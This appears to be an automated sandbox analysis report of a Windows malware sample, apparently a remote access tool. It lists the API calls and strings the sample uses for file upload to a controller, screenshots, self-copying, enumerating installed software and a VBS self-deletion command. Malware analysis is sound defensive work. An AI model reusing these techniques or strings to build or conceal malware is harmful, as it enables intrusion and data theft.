                                                              • API String ID: 1602526932-4212202414
                                                              • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                              • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                              • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                              • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                              Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe,00000001,00407688,C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe,00000003,004076B0,004752D8,00407709), ref: 004072BF
                                                              • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                              • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                              • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                              • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                              • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                              • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                              • API String ID: 1646373207-3483908034
                                                              • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                              • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                              • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                              • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                              Function 0040CE34 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 203fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 0040CE42
                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                              • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                                              • _wcslen.LIBCMT ref: 0040CF21
                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                              • CopyFileW.KERNEL32(C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe,00000000,00000000), ref: 0040CFBF
                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                              • _wcslen.LIBCMT ref: 0040D001
                                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                              • ExitProcess.KERNEL32 ref: 0040D09D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                              • String ID: 6$C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe$del$open
                                                              • API String ID: 1579085052-3059378046
                                                              • Opcode ID: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                                              • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                              • Opcode Fuzzy Hash: cf3ade877b167e70c46e53b810f9fed9df6f55308ddf96a6d8fe48dcf536bada
                                                              • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                              Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                              • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                              • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                              • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                              • _wcslen.LIBCMT ref: 0041C1CC
                                                              • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                              • GetLastError.KERNEL32 ref: 0041C204
                                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                              • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                              • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                              • GetLastError.KERNEL32 ref: 0041C261
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                              • String ID: ?
                                                              • API String ID: 3941738427-1684325040
                                                              • Opcode ID: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                              • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                              • Opcode Fuzzy Hash: a0ce836f87bdb73d1aed96e44626d16fc1f948222461cff8e144d7328d36a715
                                                              • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                              Function 00414DC1 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 109libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                              • LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                              • LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                              • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                              • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                              • String ID: EIA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                              • API String ID: 2490988753-3346362794
                                                              • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                              • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                                              • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                                              • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                                              Function 0044F4AD Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$EnvironmentVariable$_wcschr
                                                              • String ID:
                                                              • API String ID: 3899193279-0
                                                              • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                              • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                              • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                              • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                              Function 00412AEF Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 482sleepfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                                • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                              • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                                              • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                                              • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                                              • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                                              • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                                              • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                                              • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                                              • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                              • String ID: /stext "$0TG$0TG$NG$NG
                                                              • API String ID: 1223786279-2576077980
                                                              • Opcode ID: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                                              • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                                              • Opcode Fuzzy Hash: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                                              • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                                              Function 0041C720 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                                              • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseEnumOpen
                                                              • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                              • API String ID: 1332880857-3714951968
                                                              • Opcode ID: f13192da4e66231cc3a913cdaba6528dc2f099d68fe13da123ac92ab36a9ee38
                                                              • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                              • Opcode Fuzzy Hash: f13192da4e66231cc3a913cdaba6528dc2f099d68fe13da123ac92ab36a9ee38
                                                              • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                              Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                              • GetCursorPos.USER32(?), ref: 0041D67A
                                                              • SetForegroundWindow.USER32(?), ref: 0041D683
                                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                              • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                              • ExitProcess.KERNEL32 ref: 0041D6F6
                                                              • CreatePopupMenu.USER32 ref: 0041D6FC
                                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                              • String ID: Close
                                                              • API String ID: 1657328048-3535843008
                                                              • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                              • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                              • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                              • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                              Function 00445DD7 Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$Info
                                                              • String ID:
                                                              • API String ID: 2509303402-0
                                                              • Opcode ID: d11cf9d75a9b095113a5c4e7a536203a51778a2c4217635f9f2315e0a594c0ce
                                                              • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                              • Opcode Fuzzy Hash: d11cf9d75a9b095113a5c4e7a536203a51778a2c4217635f9f2315e0a594c0ce
                                                              • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                              Function 00408BB5 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 328fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                              • __aulldiv.LIBCMT ref: 00408D88
                                                                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                              • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                              • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                                              • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                              • API String ID: 3086580692-2582957567
                                                              • Opcode ID: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                              • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                              • Opcode Fuzzy Hash: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                              • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                                              Function 0040A761 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNEL32(00001388), ref: 0040A77B
                                                                • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                                                • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                              • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,00000000,00000000,00000000), ref: 0040A962
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                              • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                              • API String ID: 3795512280-1152054767
                                                              • Opcode ID: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                                              • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                                              • Opcode Fuzzy Hash: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                                              • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                                              Function 004048C8 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 144networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • connect.WS2_32(?,?,?), ref: 004048E0
                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                              • WSAGetLastError.WS2_32 ref: 00404A21
                                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                              • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                              • API String ID: 994465650-3229884001
                                                              • Opcode ID: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                                              • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                                              • Opcode Fuzzy Hash: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                                              • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                                              Function 00451346 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • ___free_lconv_mon.LIBCMT ref: 0045138A
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                                                • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                                              • _free.LIBCMT ref: 0045137F
                                                                • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                              • _free.LIBCMT ref: 004513A1
                                                              • _free.LIBCMT ref: 004513B6
                                                              • _free.LIBCMT ref: 004513C1
                                                              • _free.LIBCMT ref: 004513E3
                                                              • _free.LIBCMT ref: 004513F6
                                                              • _free.LIBCMT ref: 00451404
                                                              • _free.LIBCMT ref: 0045140F
                                                              • _free.LIBCMT ref: 00451447
                                                              • _free.LIBCMT ref: 0045144E
                                                              • _free.LIBCMT ref: 0045146B
                                                              • _free.LIBCMT ref: 00451483
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                              • String ID:
                                                              • API String ID: 161543041-0
                                                              • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                              • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                                              • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                              • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                                              Function 0041A045 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 176sleeptimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0041A04A
                                                              • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                              • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                              • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                              • API String ID: 489098229-1431523004
                                                              • Opcode ID: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                                              • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                              • Opcode Fuzzy Hash: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                                              • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                              Function 0040D83A Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                                                • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                                                • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 0041374F
                                                                • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00413768
                                                                • Part of subcall function 00413733: RegCloseKey.ADVAPI32(?), ref: 00413773
                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                              • ExitProcess.KERNEL32 ref: 0040D9FF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_400000_mXJeXQoaGktJCW.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                              • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                              • API String ID: 1913171305-3159800282
                                                              • Opcode ID: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
                                                              • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                              • Opcode Fuzzy Hash: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
